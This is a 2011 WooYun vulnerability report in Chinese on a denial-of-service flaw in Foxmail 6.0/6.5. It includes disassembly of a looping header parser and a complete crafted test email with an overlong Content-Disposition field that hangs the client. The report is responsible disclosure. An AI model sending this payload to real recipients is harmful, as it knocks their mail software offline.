当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02787

漏洞标题:Foxmail拒绝服务漏洞

相关厂商:腾讯

漏洞作者: mog

提交时间:2011-09-05 22:44

修复时间:2011-10-05 22:45

公开时间:2011-10-05 22:45

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-09-05: 细节已通知厂商并且等待厂商处理中
2011-09-06: 厂商已经确认,细节仅向厂商公开
2011-09-16: 细节向核心白帽子及相关领域专家公开
2011-09-26: 细节向普通白帽子公开
2011-10-06: 细节向实习白帽子公开
2011-10-05: 细节向公众公开

简要描述:

Foxmail 6.0,6.5存在拒绝服务漏洞,通过发送特殊的构造的邮件可使软件失去响应

详细说明:

foxmail没有对部分邮件字段进行正确的处理
007DA607 8D45 F8 /LEA EAX,DWORD PTR SS:[EBP-8]
007DA60A 8A543E FF |MOV DL,BYTE PTR DS:[ESI+EDI-1]
007DA60E E8 AD9AC2FF |CALL Foxmail.004040C0
007DA613 8B55 F8 |MOV EDX,DWORD PTR SS:[EBP-8]
007DA616 8B45 FC |MOV EAX,DWORD PTR SS:[EBP-4]
007DA619 E8 AE9BC2FF |CALL Foxmail.004041CC
007DA61E 8B45 FC |MOV EAX,DWORD PTR SS:[EBP-4]
007DA621 43 |INC EBX
007DA622 8BC6 MOV EAX,ESI
007DA624 E8 9B9BC2FF |CALL Foxmail.004041C4 ;取字符串长度
007DA629 8BFB |MOV EDI,EBX
007DA62B 81E7 FF000000 |AND EDI,0FF ;和0xff取与
007DA631 3BC7 |CMP EAX,EDI ;edi 和0xff取与后一定小于0xff,所有eax大于255字符长度就不会除法下面判断条件,进入死循环
007DA633 7C 14 |JL SHORT Foxmail.007DA649
007DA635 8A443E FF |MOV AL,BYTE PTR DS:[ESI+EDI-1]
007DA639 2C 0A |SUB AL,0A
007DA63B 74 0C |JE SHORT Foxmail.007DA649
007DA63D 2C 03 |SUB AL,3
007DA63F 74 08 |JE SHORT Foxmail.007DA649
007DA641 2C 13 |SUB AL,13
007DA643 74 04 |JE SHORT Foxmail.007DA649
007DA645 2C 1B |SUB AL,1B
007DA647 ^75 BE JNZ SHORT Foxmail.007DA607

漏洞证明:

测试邮件内容
From: "test"<test@163.com>
To: "test"<test@test.com>
Subject: test
X-Priority: 1
Content-Type: multipart/mixed;
boundary="=====001_Dragon874648247250_====="
--=====001_Dragon874648247250_=====
Content-Type: multipart/alternative;
boundary="=====003_Dragon874648247250_====="
--=====003_Dragon874648247250_=====
Content-Type: text/html;
charset="gb2312"
Content-Transfer-Encoding: 7bit
test
--=====003_Dragon874648247250_=====--
--=====001_Dragon874648247250_=====
Content-Type: application/octet-stream;
Content-Transfer-Encoding: base64
Content-Disposition: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
filename="t.txt"
c3Nzc3Nzc3Nzc3M=
--=====001_Dragon874648247250_=====--

修复方案:

版权声明:转载请注明来源 mog@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2011-09-06 15:44

厂商回复:

thx

最新状态:

暂无